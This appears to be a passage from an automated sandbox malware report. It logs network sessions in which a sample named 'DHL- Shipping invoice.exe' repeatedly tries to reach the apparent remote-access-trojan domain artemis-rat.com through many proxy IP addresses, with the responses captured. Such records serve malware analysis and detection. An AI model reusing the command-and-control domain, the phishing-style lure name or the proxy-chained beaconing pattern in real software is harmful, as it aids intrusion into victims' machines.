                            1729192.168.2.455107107.180.88.41576426484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.561351061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1730192.168.2.455075149.210.235.10781186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.572799921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.140623093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.641307116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.330944061 CET132INHTTP/1.1 503 Too many open connections
                            Content-Type: text/plain
                            Connection: close
                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                            Data Ascii: Maximum number of open connections reached.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1731192.168.2.4550715.75.192.13806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.594156981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1732192.168.2.453261178.128.113.118231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.595057964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640769005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.736275911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.749360085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:30.843599081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:42.939553022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:43.769844055 CET536INHTTP/1.1 502 Bad Gateway
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:43 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 3694
                            X-Squid-Error: ERR_CONNECT_FAIL 0
                            Vary: Accept-Language
                            Content-Language: en
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72
                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><title>ERROR: The r


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1733192.168.2.45516718.135.133.116806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.608053923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.767698050 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0
                            Mar 12, 2024 08:37:06.768285036 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 22 ce 63 bc 09 e6 5f 28 66 3a 4b f6 13 e9 b6 39 de 03 c1 66 69 cc 00 c5 21 4e 92 fd be 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: e"c_(f:K9fi!N*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:06.926615953 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 68 4f 0d ec ac 7d c3 3b 6b 12 7a 3a b0 4d d7 2c b8 01 ab b2 89 e0 16 77 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                            Data Ascii: =9hO};kz:M,wDOWNGRD0000*H010Uartemis-rat.com0240312064921Z260312064921Z010Uartemis-rat.com0"0*H0*zH%JE,B#
                            Mar 12, 2024 08:37:06.993957043 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 03 60 b9 20 83 be 61 b6 a2 1b 2e 0f 27 5f a6 f7 b0 44 ba b5 ec d0 a9 59 e0 00 17 f2 e5 4f da 58 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 09 fc 66 49 f3 c5 b1 73 ea 9e 9d 73 e5 eb 51 63 06 90 a4 dc 74
                            Data Ascii: %! ` a.'_DYOX(fIssQctnx
                            Mar 12, 2024 08:37:07.149454117 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 d8 a1 34 8f cc 28 25 53 3d 68 93 50 82 27 af 82 06 14 e0 3a f7 9a ad d5 db aa 4c b8 60 9d d0 ce 0e 69 fb 0a 9c db fe 97
                            Data Ascii: (4(%S=hP':L`i


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1734192.168.2.455185172.67.242.194806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.608436108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.696172953 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1735192.168.2.455191162.159.247.57806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.612152100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.699784994 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1736192.168.2.455204104.16.143.127806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.620913029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.708175898 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1737192.168.2.45504938.54.38.116806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.621814013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.869626999 CET176INHTTP/1.1 404 Not Found
                            Content-Type: text/plain; charset=utf-8
                            X-Content-Type-Options: nosniff
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Length: 19
                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                            Data Ascii: 404 page not found


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1738192.168.2.454991157.230.250.185257856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.626374960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453289032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.684247971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.140995026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.953288078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1739192.168.2.455210104.19.225.70806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.627074003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.715286970 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1740192.168.2.455159185.82.238.20356786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.633404016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1741192.168.2.455220172.67.250.212806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.634195089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.721414089 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1742192.168.2.45512334.95.243.12280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.642551899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1743192.168.2.454973124.163.236.5473026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.643251896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.640543938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.074529886 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1744192.168.2.455028221.153.92.39806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.710061073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1745192.168.2.45501947.56.110.20489896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.710130930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1746192.168.2.455152213.14.32.7841536484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.719163895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1747192.168.2.455239104.18.161.122806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.725409985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.812973022 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1748192.168.2.45510191.134.140.160398036484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.729043961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.453066111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.266069889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.859536886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.859435081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1749192.168.2.455017103.23.101.3041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.729311943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1750192.168.2.45517945.87.43.152806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.729455948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1751192.168.2.455214154.205.152.9631286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:06.729458094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.877368927 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1752192.168.2.455033152.32.130.117180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
